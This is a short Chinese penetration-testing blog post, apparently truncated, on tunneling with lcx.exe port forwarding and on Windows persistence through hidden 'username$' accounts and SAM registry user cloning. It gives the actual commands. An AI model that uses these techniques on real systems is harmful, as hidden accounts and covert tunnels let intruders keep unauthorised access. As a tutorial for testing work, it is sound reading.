FisrtBqy的博客

渗透测试中常见的权限提升和维持手段

隧道技术1 内网代理正向：工具机主动连接目标机，目标机处于监听状态。两者能直接连通，如在同一局域网下或者同在公网。反向：目标机主动连接工具机，工具机处于监听状态。目标机在内网，两者无法直接连通。2 端口转发和映射以下所有工具下载2.1 工具机与目标机可直接相互访问工具机lcx.exe -listen 1111 2222# 1111是在工具机上监听目标机的端口#转发到2222作为连接目标机的端口目标机lcx.exe -slave 192.168.12

权限维持1 Windows权限维持1.1 用户维持（克隆账号）1.1.1 添加一般隐藏用户的方式net user username$ passwd /add使用net user命令查看用户，发现没有username$这个用户但是通过控制面板→管理账户中可以看到该用户。1.1.2 注册表克隆用户隐藏需要先完成上一步🙄打开注册表编辑器：Win+R→regedit，找到如下路径：发现SAM路径下没有权限查看，这里修改权限：菜单栏编辑→权限，修改后F5刷新